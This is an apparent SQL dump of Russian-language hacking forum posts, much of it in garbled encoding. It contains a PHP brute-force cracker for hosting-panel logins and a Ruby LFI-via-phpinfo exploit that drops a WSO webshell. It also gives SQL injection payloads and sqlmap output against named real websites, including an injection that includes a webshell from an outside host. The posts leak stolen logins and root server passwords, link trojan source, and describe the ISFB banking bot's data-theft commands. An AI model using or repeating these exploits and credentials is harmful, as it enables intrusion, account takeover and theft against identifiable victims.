Janissaries.Org\\n\"; \r\n foreach($passlist as $pass) \r\n { \r\n $cracked = false; \r\n \r\n $pass=trim($pass); \r\n \r\n $result = $this->post($site,$usernames[$id],$pass); \r\n \r\n if(preg_match(\'/security_token/\',$result)) \r\n { \r\n $cracked = true; \r\n echo \"[+]$pass password cracked for $usernames[$id]\\n\"; \r\n echo \"-------------------------------------------------------\\n\\n\"; \r\n $this->savefile(\"$site|$usernames[$id]|$pass\"); \r\n break; \r\n } \r\n \r\n } \r\n if(!$cracked){echo \"[-]Not found\\n\";echo \"-------------------------------------------------------\\n\\n\";} \r\n } \r\n \r\n } \r\n \r\n private function make_username() \r\n { \r\n $op = explode(\"\\n\",$this->openfile($this->sitelist)); \r\n foreach($op as $site) \r\n { \r\n \r\n if(eregi(\'http://\',$site)) $site = str_replace(\"http://\",\"\",$site); \r\n if(!eregi(\'www\',$site)) $site = \"www.\".$site; \r\n \r\n $site = explode(\".\",$site); \r\n $site = str_replace(\"-\",\"\",$site[1]); \r\n \r\n $usernames[] = substr($site,0,8); \r\n \r\n } \r\n return $usernames; \r\n } \r\n \r\n public function lists() \r\n { \r\n echo \"[!]Site list: \"; \r\n $sitelist = fgets(STDIN); \r\n $sitelist = str_replace(\"\\r\\n\",\"\",$sitelist); \r\n $sitelist = trim($sitelist); \r\n echo \"[!]Pass list: \"; \r\n $passlist = fgets(STDIN); \r\n $passlist = str_replace(\"\\r\\n\",\"\",$passlist); \r\n $passlist = trim($passlist); \r\n \r\n return array($sitelist,$passlist); \r\n } \r\n \r\n private function post($site,$user,$pass) \r\n { \r\n $curl = curl_init(); \r\n curl_setopt($curl,CURLOPT_RETURNTRANSFER,true); \r\n curl_setopt($curl,CURLOPT_URL,$site.\"/login/?login_only=1\"); \r\n curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0); \r\n curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0); \r\n curl_setopt($curl,CURLOPT_TIMEOUT,7); \r\n curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true); \r\n curl_setopt($curl,CURLOPT_POST,1); \r\n curl_setopt($curl,CURLOPT_POSTFIELDS,\"user=$user&pass=$pass\"); \r\n $exec = curl_exec($curl); \r\n return $exec; \r\n } \r\n \r\n private function pass_site($site) \r\n { \r\n $curl = curl_init(); \r\n curl_setopt($curl,CURLOPT_RETURNTRANSFER,true); \r\n curl_setopt($curl,CURLOPT_URL,$site); \r\n curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0); \r\n curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0); \r\n curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true); \r\n curl_setopt($curl,CURLOPT_TIMEOUT,7); \r\n $exec = curl_exec($curl); \r\n $info = curl_getinfo($curl); \r\n \r\n if($info[\'http_code\'] != 0) \r\n { \r\n return true; \r\n } \r\n else \r\n { \r\n return false; \r\n } \r\n \r\n } \r\n \r\n private function openfile($file) \r\n { \r\n $file = @file_get_contents($file); \r\n if(!$file) exit(\"WTF File not found ?\"); \r\n return $file; \r\n } \r\n \r\n private function savefile($content) \r\n { \r\n $file = fopen(\'crackerlog.txt\',\'ab\'); \r\n fwrite($file,$content.\"\\r\\n\"); \r\n fclose($file); \r\n return $file; \r\n } \r\n\r\n} \r\n\r\n$class = new cracker(); \r\n$lists = $class->lists(); \r\n\r\n if(empty($lists[0]) || empty($lists[1])) exit(\"WTF Empty ? \"); \r\n \r\n$class->sitelist = $lists[0]; \r\n$class->passlist = $lists[1]; \r\n$class->calis(); \r\n\r\n\r\n?>\r\n[/code]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1057, 1051, 0, 'w0rm', 1, 'ipcheker httpd.conf', 1403411721, 'âуû÷ð ÑÂòõрÑÂõт ÑÂÿøÑÂþú ôþüõýþò ÑÂþ ÑÂÿøÑÂúþü IP-ðôрõÑÂþò ýð ÑÂþþтòõтÑÂтòøõ. ßрøüõýÑÂõтÑÂѠôûѠтþóþ чтþñы ÷ýðть úðúøõ ôþüõýы õщõ þÑÂтðûøÑÂÑŒ ýð ôðýýþü ÑÂõрòðúõ ð úðúøõ ÿõрõõхðûø.\r\n\r\nßøшõт рõ÷уûьтðт ò тõüÿ фðùû, ø ÿþ ÷ðòõршõýøю рðñþты ÿþúðöõт ÑÂÑÂыûúу ýð ýõóþ.\r\n\r\nØÑÂхþôýøú: [url]https://gist.github.com/nepohelovski/1932575[/url]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1056, 1050, 0, 'w0rm', 1, 'kinospisok.ru', 1403411561, 'ÃÂøчõóþ ÿрøüõчðтõûьýþóþ, úрþüõ тþóþ, чтþ ÑÂтþт ÑÂðùт ñыû уÑÂтðýþòûõý úðú ôþüðшýÑÂÑ ÑÂтрðýøцð ò ýõÑÂúþûьúøх òõрÑÂøÑÂÑ… ñрðу÷õрþò Üþ÷øûûы ÿрø ÑÂúðчøòðýøø. Üþöõт úтþ ø ÿþüýøт.\r\n\r\n_http://www.kinospisok.ru/index.php\r\n\r\nLogin: AlexWolf\r\nPass: WLxv1m\r\n\r\nLogin: EScorp\r\nPass: pMUizH\r\n\r\nLogin: diagnos\r\nPass: ma_horyma', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1055, 1049, 0, 'w0rm', 1, 'Þýûðùý þñüõýýøú', 1403411503, '_http://smsobmen.com/page.php?id=20\'+/*!order+by+10*/+--+ TRUE\r\n\r\n_http://smsobmen.com/page.php?id=20\'+/*!order+by+10*/+--+ FALSE\r\n\r\n_http://smsobmen.com/page.php?id=20\'+/*!and*/1=\'1 TRUE\r\n\r\n_http://smsobmen.com/page.php?id=20\'+/*!and*/1=\'2 FALSE\r\n\r\nÃЄԄÂтúøù WAF.\r\n\r\n[url]http://smsobmen.com/admin/[/url]\r\nromdev\r\nmek777555', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1070, 1062, 0, 'Psych0tr1a', 11, '[Ruby] LFI via phpinfo() exploit', 1403473503, '[code]require \'socket\'\nrequire \'uri\'\nrequire \'net/http\'\n\ndef main()\n\n #setting up\n puts \"SETTING UP\"\n \n target = \'%phpinfo%\' # phpinfo()\n lfi = \'%lfi%\' # LFI template like http://www.host.com/data/lfi.php?location={LFI}\n payloadLocation = \'payload.txt\' # payload\n junkFilesCount = 50 # tail\n recvBufferSize = 1024 # receive buffer size\n\n # just echo for u\n printDotted(\' -target:\')\n print(\"[#{target}]\\n\");\n \n printDotted(\' -lfi:\')\n print(\"[#{lfi}]\\n\");\n \n printDotted(\' -payload:\')\n print(\"[#{payloadLocation}]\\n\");\n \n printDotted(\' -junk files count:\')\n print(\"[#{junkFilesCount}]\\n\");\n \n printDotted(\' -receive buffer size:\')\n print(\"[#{recvBufferSize}]\\n\");\n \n # try to load payload\n begin\n printDotted(\'LOAD PAYLOAD\')\n payload = IO.read(payloadLocation)\n print(\"[OK]\\n\")\n rescue\n print(\"[ERROR]\\n\")\n return\n end\n\n # payload\n file = \"-----------------------------89q8834898293409rw29\\r\\n\"\n file += \"Content-Disposition: form-data; name=\\\"file_loader\\\"; filename=\\\"\\r\\npayload.txt\\\"\\r\\n\"\n file += \"Content-Type: text/plain\\r\\n\\r\\n\"\n file += \"#{payload}\\r\\n\"\n file += \"-----------------------------89q8834898293409rw29\\r\\n\"\n \n # generate junk files\n printDotted(\'PREPARE JUNK\')\n \n curJunkFiles = 0;\n \n for junkFiles in 0..junkFilesCount\n file += \"-----------------------------89q8834898293409rw29\\r\\n\"\n file += \"Content-Disposition: form-data; name=\\\"file\" + rand(10000).to_s + \"\\\"; filename=\\\"\\r\\njunk\" + rand(1000000).to_s * 10000 + \".txt\\\"\\r\\n\"\n file += \"Content-Type: text/plain\\r\\n\\r\\n\"\n file += \"superslow\\r\\n\"\n file += \"-----------------------------89q8834898293409rw29\\r\\n\"\n end\n \n print(\"[OK]\\n\")\n \n printDotted(\'prepare headers\')\n \n targetURI = URI(target)\n \n query = targetURI.path\n \n # add query if not empty\n if !targetURI.query.nil?\n query += \'?\' + targetURI.query\n end\n \n # headers\n req = \"POST #{query} HTTP/1.0\\r\\n\"\n req += \"Content-Type: multipart/form-data; boundary=---------------------------89q8834898293409rw29\\r\\n\"\n req += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\n req += \"User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\\r\\n\"\n req += \"Host: #{targetURI.host}\\r\\n\"\n req += \"Content-Length: #{file.length}\\r\\n\"\n req += \"Connection: Close\\r\\n\\r\\n\"\n \n req += file\n \n print(\"[OK]\\n\")\n\n # create tcp socket \n sock = Socket.new(:INET, :STREAM)\n \n # and set receive buffer size\n sock.setsockopt(Socket::SOL_SOCKET, Socket::SO_RCVBUF, recvBufferSize) \n \n printDotted(\'connecting to\')\n \n begin\n sock.connect(Socket.pack_sockaddr_in(80, targetURI.host))\n rescue\n print(\"[ERROR]\\n\")\n return false\n end\n \n print(\"[OK]\\n\")\n\n sock.write(req)\n \n data = \'\'\n payloadFound = false\n loaderFound = false\n payloadFileName = \'\'\n loaderFileName = \'\'\n \n while true\n \n printDotted(\"get next #{recvBufferSize} bytes\")\n \n tmpData = sock.recv(recvBufferSize)\n \n print(\"[OK]\\n\")\n \n if tmpData.nil?\n break\n end\n \n data += tmpData\n \n tmpFileName = data.scan(/\\[name\\]\\s=>\\spayload.txt\\n\\s\\s\\s\\s\\[type\\]\\s=>\\stext\\/plain\\n\\s\\s\\s\\s\\[tmp_name\\]\\s=>\\s(.*?)\\n\\s\\s\\s\\s\\[error\\]/)\n \n if tmpFileName.length > 0\n payloadFound = true\n payloadFileName = tmpFileName[0][0].clone\n \n printDotted(\'payload file location:\')\n print(\'[\' + payloadFileName + \']\' + \"\\n\")\n \n lfi += payloadFileName + \'%00\'\n \n lfiURI = URI(lfi)\n \n printDotted(\"Include #{payloadFileName}\")\n \n response = Net::HTTP.get_response(lfiURI);\n \n if !response.is_a?(Net::HTTPOK) then \n print(\"[ERROR]\\n\")\n return\n else\n print(\"[OK]\\n\")\n end \n \n return\n end\n \n end\nend\n\ndef printDotted(msg)\n print msg + \".\" * (50 - msg.length)\nend\n\nmain()[/code]\n\nÃâ€Ã»Ñ Ã·Ã°Ã¿ÑƒÑÂúð ýуöõý фðùû payload.txt\nã üõýѠÑÂúÑÂÿûþøт рðñþтðõт ÿþчõüутþ тþûьúþ úþóôð payload.txt ûõöøт ò úþрýõòþù ÿðÿúõ Ѡруñø ð ýõ ò ÿðÿúõ Ñ ÑÂúÑÂÿûþøтþü.\n\nüþù payload.txt Ѡ÷ðрÑÂöõýýыü ò ýõóþ WSO ûõöøт ò ðттðчõ', 1, 0, '141.101.75.20', 0, 1, 1, 0, 0),
(1069, 1033, 1036, 'Psych0tr1a', 11, '', 1403473024, 'ï ôðûёú þт тõüы ñþтþò, ÑÂúðöøтõ ð ÿþôýøüðõт ûø þý http/s proxy øûø socks?', 1, 0, '141.101.75.20', 0, 1, 0, 0, 0),
(1068, 1061, 0, 'w0rm', 1, 'fbooka.com', 1403466211, 'ÑÂúѠÑÂõрòõр ÿðртýõрúø [url]http://fbooka.com/[/url]\r\n\r\nip:188.64.170.46\r\nlogin:root\r\npassword:2rh7L8is93dO', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1127, 1089, 0, 'null', 9, 'SQl inj .DK domain', 1403855906, '1))) [url]http://www.adgangforalle.dk/default.efact?pid=3846[/url]\r\n\r\n[QUOTE]Place: GET\r\nParameter: pid\r\n Type: boolean-based blind\r\n Title: AND boolean-based blind - WHERE or HAVING clause\r\n Payload: pid=3846) AND 4280=4280 AND (7479=7479\r\n\r\n\r\navailable databases [1]:\r\n[*] efaktum[/QUOTE]', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0),
(1065, 1050, 1056, 'Kingbeef', 3, '', 1403428852, '[CODE]_ttp://www.kinospisok.ru/index.php?act=film&view=film&obj=10561+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+g[/CODE]', 1, 0, '141.101.99.181', 0, 1, 0, 0, 0),
(1128, 1089, 1127, 'null', 9, '', 1403855951, '2))) http://fagbesk.sam.sdu.dk/study/fagbasen/fagbesk.shtml?fag_id=27546\"\r\n[QUOTE]Place: GET\r\nParameter: fag_id\r\n Type: boolean-based blind\r\n Title: AND boolean-based blind - WHERE or HAVING clause\r\n Payload: fag_id=27546 AND 8395=8395\r\n\r\n Type: error-based\r\n Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)\r\n Payload: fag_id=27546 AND 8693=CTXSYS.DRITHSX.SN(8693,(CHR(113)||CHR(115)||CHR(110)||CHR(97)||CHR(113)||(SELECT (CASE WHEN (8693=8693) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(115)||CHR(99)||CHR(121)||CHR(113)))\r\n\r\n Type: AND/OR time-based blind\r\n Title: Oracle AND time-based blind (heavy query)\r\n Payload: fag_id=27546 AND 8845=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)\r\n\r\n[07:46:09] [INFO] fetching tables for databases: \'APEX_030200, APEX_040200, BLACKBOARD, CTXSYS, FAGBASEN, FAGBASEN13, FAGBASEN13_DEV, FAGBASEN14_DEV, FLOWS_030000, KUB, MDSYS, OLAPSYS, STADS, SYS, SYSTEM, TP, WKSYS, XDB\'\r\n\r\n[/QUOTE]', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0),
(1063, 1057, 0, 'w0rm', 1, '[src]RDPammyy evil1.0', 1403420217, '[b]info[/b]\r\nIn the current version attachey AmmyyAdmin + SOURCE + CONTROL PANEL + screenshot admin.\r\nTroy was written in PureBasic v 4.40 + Droopy `s lib\r\n\r\n[URL=\"https://www.dropbox.com/s/dlpb8zcm343dh2c/RDPamy.zip\"]download[/URL]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1074, 1064, 1073, 'null', 9, '', 1403495993, 'link\r\n[url]http://e4.kupikupon.ru/u/gm.php?UID=1tnRYL1UUy&ID=129788905_78022_1180788[/url]\r\nÒыòþô Sqlmap\r\n\r\nsudo sqlmap -u \"http://e4.kupikupon.ru/u/gm.php?UID=1tnRYL1UUy&ID=129788905_78022_1180788\" --dbs\r\n\r\n---\r\nPlace: GET\r\nParameter: ID\r\n Type: boolean-based blind\r\n Title: AND boolean-based blind - WHERE or HAVING clause\r\n Payload: UID=1tnRYL1UUy&ID=129788905_78022_1180788 AND 4317=4317\r\n\r\n Type: AND/OR time-based blind\r\n Title: MySQL > 5.0.11 AND time-based blind\r\n Payload: UID=1tnRYL1UUy&ID=129788905_78022_1180788 AND SLEEP(5)\r\n---\r\n[03:53:59] [INFO] the back-end DBMS is MySQL\r\nweb application technology: Nginx\r\nback-end DBMS: MySQL 5.0.11\r\n[03:53:59] [INFO] fetching database names\r\n[03:53:59] [INFO] fetching number of databases\r\n[03:53:59] [WARNING] running in a single-thread mode. Please consider usage of o\r\n[03:53:59] [INFO] retrieved:\r\n[03:54:01] [INFO] retrieved:\r\n[03:54:01] [WARNING] it is very important not to stress the network adapter duri\r\n\r\n[03:54:02] [WARNING] in case of continuous data retrieval problems you are advis\r\n[03:54:02] [ERROR] unable to retrieve the number of databases\r\n[03:54:02] [INFO] falling back to current database\r\n[03:54:02] [INFO] fetching current database\r\n[03:54:02] [INFO] retrieved:\r\n[03:54:08] [INFO] retrieved:\r\ndo you want sqlmap to try to optimize value(s) for DBMS delay responses (option\r\n[03:54:30] [INFO] adjusting time delay to 2 seconds due to good response times\r\nemarsys_int\r\navailable databases [1]:\r\n[*] emarsys_int\r\n\r\n[03:56:51] [INFO] fetched data logged to text files under \'/usr/share/sqlmap/out\r\n\r\n[*] shutting down at 03:56:51\r\n\r\nHavij Òыôðõт туöõ ñô\r\n\r\nGoogle dork\r\nfiletype:php inurl:gm.php?UID=\r\n\r\nßрþòõрøû ÿõрòыõ 3 ÑÂÑÂыûúø ø÷ óуóûð\r\nòþ òÑÂõх ÑÂúуÃȄÂ, ÿþüþóøтõ Ѡÿþôñþрþü ñô', 1, 0, '141.101.98.70', 0, 1, 0, 0, 0),
(1076, 1064, 1074, 'w0rm', 1, '', 1403507321, '_ttp://e4.kupikupon.ru/u/gm.php?UID=1tnRYL1UUy&ID=129788905_78022_1180788+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+k\r\n\r\n- account\r\n- administrators\r\n- content\r\n- customers\r\n- info\r\n\r\n\r\n[email]octavian.filimon@emarsys.com[/email] : 69f7cbc6620859bf : filimon1234\r\n\r\n[url]http://www.emarsys.com/ru/[/url] - рð÷рðñы ÑÂúрøÿтð\r\nebay cрõôø øх úûøõýтþò :D\r\n\r\n_ttp://link.ebay.com/u/gm.php?UID=9wFUwxW5B7&ID=147094560_775085_779\r\n\r\navailable databases [1]:\r\n[*] emarsys_int', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1073, 1064, 0, 'w0rm', 1, 'заказы', 1403494841, 'ÞñъÑÂòÃȄÂÑŽ ôðýýую ýõôõûю ýõôõûõù ÑÂúøôþчýых ÑÂðùтþò!\r\n\r\nÃÂðѠøýтõрõÑÂуют:\r\n\r\n[B] - ñøóûøþý\r\n - úуÿøúуÿþý\r\n - óруÿþý\r\n - etc[/B]\r\n\r\nßûðтÑÂÑ‚: 50 тр\r\n\r\nßрõôûðóðю þ ÑÂòþøх ýðхþôúðх ÿøÑÂðть тут ò ÑÂûучðõ ÑÂþòüõÑÂтýþù рðÑÂúрутúø рðÑÂÿøû ò ÿрþцõýтýþü ÑÂþþтýþшõýøø.', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1071, 1033, 1069, 'w0rm', 1, '', 1403474386, '_http://forum.antichat.ru/thread327721.html', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1072, 1063, 0, 'w0rm', 1, 'code_exec чõрõ÷ SQLi', 1403494218, 'ÕÑÂûø ÑÂúрøÿт уôðûõýýþ øýúûуôøт ò ÑÂõñѠÑÂúрøÿт Ñ ÑÂúуûõù ø ÿрø ÑÂтþü üþöýþ üõýÑÂть ÿðрðüõтр ò øýúûуôõ тþ òþ÷üþöõý rce\n\nÿрøüõр:\n[code]_ttp://m.sverige.nu/index.html[/code]\n\näðùû index.html ÑÂþôõрöøт тðúþù úþô\n[php] [/php]\n\nßрøüõр õúÑÂÿûуðтðцøø:\n[code]\n_ttp://m.sverige.nu/index.html?ny=999999%27/%2A%2A/union/%2A%2A/select/%2A%2A/1,2,concat%280x3c3f70687020696e636c7564652822687474703a2f2f7777772e6f6e6c696e6561756374696f6e2e636f6d2f746d702f746573742f77736f2e74787422293b203f3e%29,4,5,6,7,8,9,10,11,12/%2A%2A/and/%2A%2A/%27x%27=%27x\n[/code]\n\nßрø ÿþôþñýþü ÷ðÿрþÑÂõ ÿрþøÑÂхþôøт ÿрøüõрýþ ÑÂûõôующõõ:\n\náÑÂыûúð þтúрыòðõтÑÂѠôûѠøýúûуôð. Ã’ ÑÂтþöõ òрõüѠsql øýъõúцøѠòþ÷òрðщðõт ò тõûþ ÑÂтрðýøцы:\n\n[php][/php]\n\náтрðýøцð øýúûуôøтÑÂѠø ÑÂþþтòõтÑÂтòõýýþ òõÑÂÑŒ ÿхÿ úþô òÑÂтрõчðющõùÑÂѠýð ýõù òыÿþûýÑÂõтÑÂÑÂ.\n\nthx: [b]Psych0tr1a[/b]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1077, 1063, 1072, 'Psych0tr1a', 11, '', 1403510770, 'ßõрõчøтðò ÑÂтþ õщё рð÷ üýõ òþт чтþ ÿрõôÑÂтðòøûþÑÂÑŒ:\r\n\r\nÃÂðхþôøü ûþúðûьýыù øýúûуô ø ÑÂúуûю ýð þôýþü хþÑÂтõ, øýúûуôøü фðùû Ñ ÑÂúуûõù, ôþñðòÃȄÂõü ÿðрðüõтры Ѡòыòþôþü ÿхÿ úþôð ø ò рõ÷уûьтðтõ rce? øûø ýõт?\r\n\r\n\r\nÚðú ôуüðõтõ òþ÷üþöõý ûø ÑÂтþт òõúтþр ôûѠûþúðûьýых øýúûуôþò??', 1, 0, '141.101.75.20', 0, 1, 0, 0, 0),
(1078, 1063, 1077, 'w0rm', 1, '', 1403511172, 'Þý ôþûöõý рðñþтðть ø ÑÂõùчðÑÂ. Ã’ ÿрøýцøÿõ ò тðúþù ÑÂøтуðцøø òыÿþûýøтÑÂѠûюñþù php ÑÂцõýðрøù.', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1079, 1063, 1078, 'Psych0tr1a', 11, '', 1403511598, 'ÜõýѠÑÂüущðõт тþ чтþ ÿрø lfi òþ÷üþöýþ ÑÂýðчðûð ÿрþøýúûуôøтÑÂÑ ÑÂþôõрöøüþõ фðûùð ñõ÷ òыòþôð ÑÂúуûø. ð ÿþтþü уöõ òыòõôõтÑÂѠÿхÿ úþô', 1, 0, '141.101.75.20', 0, 1, 0, 0, 0),
(1080, 1063, 1079, 'Psych0tr1a', 11, '', 1403512398, 'òþñщõü úðúтþûьúþ ÿþôòõрýõтÑÂѠхþрþшøù ÿрøüõр ÿрþòõрю ÑÂтþ ýð ÿрðúтøúõ ø þтÿøшу.', 1, 0, '141.101.75.20', 0, 1, 0, 0, 0),
(1081, 1063, 1080, 'Bo0om', 7, '', 1403516353, 'àѠôуüðû lfi уöõ ÿþ ôõфþûту rce)', 1, 0, '141.101.98.182', 0, 1, 0, 0, 0),
(1082, 1063, 1081, 'w0rm', 1, '', 1403521970, 'ты þшøñðÃȄÂÑÂ) \n\nÜøýутúð ðñрõòøðтур:\n\nlocal_file_include ýõ üþöõт ñыть remote_code_ÑÂúÑÂÑÂѠøñþ local<>рõüþут ýþ ýø úðú ýõ рðòýþ.\n \nÃÂтþ úðú ýð÷òðть уÑÂ÷òøüþÑÂть ò ôöуüûõ 0day, òрþôõ ø ÿрõòðô_ñðó_ø_0ôýõù úðú ýðшõû, ýþ 0day ÑÂтþ уÑÂ÷òøüþÑÂтø ò ÿþ урþòýѠÑÂôрð.', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1083, 1065, 0, 'skiffha', 10, 'Isfb', 1403525179, '[QUOTE]\r\nISFB - ÿрþóрðüüð-ñþт ÿрõôýð÷ýðчõýýðѠôûѠðýðûø÷ð ø üþôøфøúðцøø HTTP трðффøúð ýð úþüÿьютõрõ úûøõýтð.\r\n\r\nßþôôõрöøòðõт òÑÂõ 32Ñ… ø 64Ñ… ñøтýыõ Windows, ýðчøýðѠѠWindows XP.\r\nßþôôõрöøòðõт òÑÂõ 32Ñ… ø 64Ñ… ñøтýыõ òõрÑÂøø Internet Explorer, ýðчøýðѠѠ6.0.\r\nßþôôõрöøòðõт òÑÂõ 32Ñ… ø 64Ñ… ñøтýыõ òõрÑÂøø Mozilla Firefox.\r\nßÞôôõрöøòðõт òÑÂõ 32Ñ… ñøтýыõ òõрÑÂøø Google Chrome.\r\n\r\nßрþóрðüüð ÑÂÿþÑÂþñýð уÑÂтðýðòûøòðтьÑÂѠø рðñþтðть ñõ÷ ÿрøòõûõóøù ðôüøýøÑÂтрðтþрð.\r\nÞñрðñðтыòðõт òõÑÂÑŒ HTTP трðффøú ñрðу÷õрð ò тþü чøÑÂûõ ø шøфрþòðýыù HTTPS.\r\n\r\nÑþт уÿрðòÃȄÂõтÑÂѠѠуôðûõýýþóþ ÑÂõрòõрð, Ѡÿþüþщью фðùûþò úþýфøóурðцøø ø úþüðýô.\r\näðùûы úþýфøóурðцøø ø úþüðýô ÿþôÿøÑÂыòðютÑÂѠÿþÑÂрõôÑÂтòþü RSA. ßрø ÿþûучõýøø фðùûþò, ñþт ÿрþòõрÑÂõт цøфрþòую ÿþôÿøÑÂÑŒ,\r\n ø, ò ÑÂûучðõ ýõÑÂþþтòõтòøѠÿþôÿøÑÂø, фðùû øóýþрøруõтÑÂÑÂ.\r\n\r\nßрø ÿõрòþü ÷ðÿуÑÂúõ ñþт øýøцøøруõт тðùüõр. Ã’ ôðûьýõùшõü, ÿþ тðùüõру, ñþт þñрðщðõтÑÂѠýð уÿрðòÃȄÂющøù ÑÂõрòõр ÷ð фðùûðüø.\r\n\r\nßþôôõрöøòðõтÑÂÑ 2 ÑÂÿþÑÂþñð ÿþøÑÂúð уÿрðòÃȄÂющõóþ ÑÂõрòõрð:\r\n- ÿõрõñþр ÷ðôðýýþóþ ÑÂÿøÑÂúð ôþüõýýых øüõý ø òыñþр ðúтøòýþóþ;\r\n- óõýõрðцøøѠôøýðüøчõÑÂúþóþ ÑÂÿøÑÂúð ôþüõýýых øüõý ò ÷ðòøÑÂøüþÑÂтø þт тõúущõù ôðты ø úþýфøóурðцøø ÑÂøÑÂтõüы;\r\n\r\nÃÂýðûø÷ трðффøúð ÿрþø÷òþôøтÑÂѠýð þÑÂýþòõ ÑÂÿõцøðûьýþ ÑÂфþрüøрþòðýýþóþ фðùûð úþýфøóурðцøø, úþтþрыù ñþт ÿþûучðõт Ñ ÑÂõрòõрð.\r\nâðúþù фðùû üþöõт ÑÂþôõрöðть ÑÂûõôующøõ øýÑÂтруúцøø:\r\n- ÿþôüõýð HTML ÑÂтрðýøцы цõûøúþü\r\n- ÷ðüõýð фрðóüõýтð HTML ÑÂтрðýøцы\r\n- ÑÂúþÿøрþòðть фрðóüõýт ÑÂтрðýøцы ø þтÿрðòøть ýð ÑÂõрòõр\r\n- ýðùтø фðùû ÿþ üðÑÂúõ ø þÿрðòøть ýð ÑÂõрòõр\r\n- ÑÂôõûðть ÑÂúрøýшþт ÑÂúрðýð ø þтÿрðòøть ýð ÑÂõрòõр\r\n\r\nÚрþüõ фðùûð úþýфøóурðцøø ñþт ÿþûучðõт Ñ ÑÂõрòõрð úþüðýôы:\r\nGET_CERTS - ÑÂúÑÂÿþртøрþòðть ø òыÑÂûðть ÑÂõртøфøúðты, уÑÂтðýþòûõýýыõ ò ÑÂøÑÂтõüýþü хрðýøûøщõ Windows. \r\n Ãâ€Ã»Ñ XP òыóруöðõт, тðúöõ, ýõÑÂúÑÂÿþртøруõüыõ ÑÂõртøфøúðты.\r\nGET_COOKIES - ÑÂþñрðть cookie FF ø IE, SOL-фðùûы Flash, уÿðúþòðть øх Ñ ÑÂþхрðýõýøõü ÑÂтруúтуры \r\n úðтðûþóþò ø òыÑÂûðть ýð ÑÂõрòõр.\r\nCLR_COOKIES - уôðûøть cookie FF ø IE, SOL-фðùûы Flash.\r\nGET_SYSINFO - ÑÂþñрðть ÑÂøÑÂтõüýую øýфþрüðцøю: тøÿ ÿрþцõÑÂÑÂþрð, òõрÑÂøю Þá, ÑÂÿøÑÂþú ÿрþцõÑÂÑÂþò, ÑÂÿøÑÂþú\r\n ôрðùòõрþò, ÑÂÿøÑÂþú уÑÂтðýþòûõýýых ÿрþóрðüü.\r\nKILL - уñøть Þá (рðñþтðõт тþûьúþ Ѡÿрðòðüø ðôüøýøÑÂтрðтþрð)\r\nREBOOT - ÿõрõ÷ðóру÷øть Þá\r\nGROUP=n - ÑÂüõýøть ID óруÿÿы ñþтð ýð n\r\nLOAD_EXE=URL - ÷ðóру÷øть фðùû Ѡуúð÷ðýýþóþ URL ø ÷ðÿуÑÂтøть õóþ\r\nLOAD_REG_EXE=URL- ÷ðóру÷øть фðùû Ѡуúð÷ðýýþóþ URL, ÷ðрõóøÑÂтрøрþòðть õóþ ò autirun ø ÷ðÿуÑÂтøть\r\nLOAD_UPDATE=URL - ÷ðóру÷øть ðÿôõùт ÿрþóрðüüы ø ÷ðÿуÑÂтøть\r\nGET_LOG - þтÿрðòøть òýутрõýýøù ûþó ýð ÑÂõрòõр\r\nGET_FILES=* - ýðùтø òÑÂõ фðùûы, ÑÂþþтòõтÑÂтòующøõ ÷ðôðýýþù üðÑÂúõ, ø þтÿрðòøть ýð ÑÂõрòõр\r\nSLEEP=n - þÑÂтðýþòøть þñрðñþтúу þчõрõôø úþüðýô ýð n üøûûøÑÂõúуýô. (øÑÂÿþûь÷уõтÑÂѠÿрø ôþûóøх þÿõрðцøÑÂÑ…)\r\nSEND_ALL - þтÿрðòøть òÑÂõ ôðýýыõ ø÷ þчõрõôø ýð þтÿрðòúу ýõüõôûõýýþ. Ã’ ÿрþтøòýþü ÑÂûучðõ, ôðýýыõ þÿрðòÃȄÂÑŽÑ‚ÑÂÑ \r\n ÿþ тðùüõру.\r\nLOAD_DLL=URL[,URL] - ÷ðóру÷øть ÿþ уúð÷ðýýþüу URL DLL ø øýöõúтøть õё ò ÿрþцõÑÂÑ explorer.exe.\r\n ÿõрòыù URL ôûѠ32Ñ…-ñøтýþù DLL, òтþрþù - ôûѠ64Ñ…-ñøтýþù.\r\n\r\nSOCKS_START=IP:PORT - ÷ðÿуÑÂтøть ÑÂþúÑÂ4\\5 ÑÂõрòõр (ÿрø õóþ ýðûøчøø)\r\nSOCKS_STOP - þÑÂтðýþòøть ÑÂþúÑÂ4\\5 ÑÂõрòõр\r\n\r\nGET_KEYLOG - þтÿрðòøть ôðýýыõ úõùûþóóõрð (ÿрø õóþ ýðûøчøø)\r\nGET_MAIL - ðúтøòøрþòðть óрðññõр E-Mail (ÿрø ýðûøчøø) ø þтÿрðòøть, ÿþûучõýýыõ þт ýõóþ, ôðýýыõ\r\nGET_FTP - ðúтøòøрþòðть óрðññõр FTP (ÿрø ýðûøчøø) ø þтÿрðòøть, ÿþûучõýýыõ þт ýõóþ, ôðýýыõ\r\n\r\n\r\nâõхýøчõÑÂúøõ 